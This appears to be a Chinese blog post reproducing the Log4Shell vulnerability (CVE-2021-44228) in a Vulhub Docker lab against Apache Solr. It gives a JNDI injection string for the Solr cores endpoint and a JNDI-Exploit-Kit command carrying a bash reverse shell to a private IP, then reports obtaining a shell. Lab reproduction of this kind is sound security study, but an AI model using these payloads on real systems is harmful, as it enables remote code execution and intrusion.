log4jshell CVE-2021-44228 复现

漏洞介绍

Log4j 是 Apache 提供的一个非常流行的 Java 日志框架。漏洞编号 CVE‑2021‑44228,就被称作 "Log4Shell",该漏洞存在于 Log4j 2 版本(从 2.0‑beta9 到 2.14.1)中,因为其日志处理机制中对 JNDI(Java 命名与目录接口)查找没有做限制或验证。攻击者只要向日志字段输入恶意 JNDI 字符串(例如 ${jndi:ldap://攻击者IP/对象}),Log4j 就会去远端服务器加载 Java 对象,从而导致 远程代码执行(RCE)

复现

通过Vulhub快速搭建环境

bash 复制代码
D:\vulhub\log4j\CVE-2021-44228
docker compose up -d

进入页面,发现Apache Solr

POST参数位置存在漏洞

bash 复制代码
/solr/admin/cores?action=${jndi:ldap://xxx}

RCE

我这里使用的java环境为java11

使用JNDI-Exploit-Kit进行利用

https://github.com/pimps/JNDI-Exploit-Kit

也可以使用ysoserial生成java反序列化载荷进行利用

https://github.com/pimps/ysoserial-modified

bash 复制代码
java -jar JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar -C 'bash -i >& /dev/tcp/192.168.10.69/4444 0>&1' -L 192.168.10.69:1234

成功得到shell

相关推荐
世界尽头与你11 小时前
(修复方案)基础目录枚举漏洞
安全·网络安全·渗透测试
独行soc11 小时前
2026年渗透测试面试题总结-20(题目+回答)
android·网络·安全·web安全·渗透测试·安全狮
独行soc1 天前
2026年渗透测试面试题总结-17(题目+回答)
android·网络·安全·web安全·渗透测试·安全狮
独行soc1 天前
2026年渗透测试面试题总结-18(题目+回答)
android·网络·安全·web安全·渗透测试·安全狮
闻哥2 天前
从测试坏味道到优雅实践:打造高质量单元测试
java·面试·单元测试·log4j·springboot
知行合一。。。2 天前
程序中的log4j、stderr、stdout日志
python·单元测试·log4j
交个_朋友2 天前
HTB SolidState writeup (攻击链分析:邮件服务为何成为初始访问的“完美入口”?)
渗透测试·oscp·htb
独自破碎E3 天前
Spring Boot测试启动失败:SLF4J日志多实现冲突解决方案
spring boot·后端·log4j
世界尽头与你3 天前
(修复方案)kibana 未授权访问漏洞
安全·网络安全·渗透测试
niaiheni3 天前
Log4j 漏洞深度分析:CVE-2021-44228 原理与本质
web安全·网络安全·log4j